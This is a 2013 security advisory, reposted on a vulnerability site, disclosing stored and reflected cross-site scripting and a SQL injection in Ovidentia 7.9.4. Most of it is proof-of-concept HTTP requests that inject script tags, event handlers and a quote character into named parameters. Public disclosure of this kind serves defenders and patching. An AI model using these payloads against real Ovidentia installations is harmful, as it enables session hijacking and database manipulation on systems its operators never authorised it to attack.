Ovidentia 7.9.4 Cross Site Scripting / SQL Injection

2013.08.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

? Ovidentia 7.9.4 Multiple Remote Vulnerabilities Vendor: Cantico Product web page: http://www.ovidentia.org Affected version: 7.9.4 Summary: Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware). Desc: Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5154 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php 08.08.2013 --- ============================================================ #1 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 tg users idx Create pos A grp widget_filepicker_job_uid[] 52154a53cc0de user[nickname] "><script>alert(1);</script> user[password1] pass123 user[password2] pass123 user[notifyuser] 0 user[sendpwd] 0 user[sn] Testingusio user[mn] M user[givenname] Testa user[email] "><script>alert(2);</script> ============================================================ #2 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 user[id] 2 tg user idx Modify item 2 pos grp widget_filepicker_job_uid[] 52154bde9410a user[nickname] test user[setpwd] 0 user[password1] user[password2] user[sendpwd] 0 user[sn] "><script>alert(3);</script> user[mn] M user[givenname] "><script>alert(4);</script> user[email] lab@zeroscience.mk GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1 ============================================================ #3 - Stored XSS ------------------------------------------------------------ POST http://localhost/ovidentia/index.php HTTP/1.1 Submit2 Update idx modify item 1 ovmldetail "><script>alert(5);</script> ovmlembedded "><script>alert(6);</script> tg admoc update ovmldb ============================================================ #4 - Reflected XSSs ------------------------------------------------------------ GET http://localhost/ovidentia/index.php?tg=users&bupd="><script>alert(7);</script> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent="><script>alert(8);</script>&uid=widget_acl99&levels=2&id_delegation=0 GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="><script>alert(9);</script> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A"><script>alert(10);</script>&grp=&sSearchText= HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);</script> HTTP/1.1 GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);</script> HTTP/1.1 GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1 GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_</script><script>prompt(14)</script>&iIdProject=-1&tg=usrTskMgr GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_</script><script>prompt(15)</script>&tg=usrTskMgr GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman ============================================================ #5 - SQL Injection ------------------------------------------------------------ GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2

References:

http://www.ovidentia.org
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top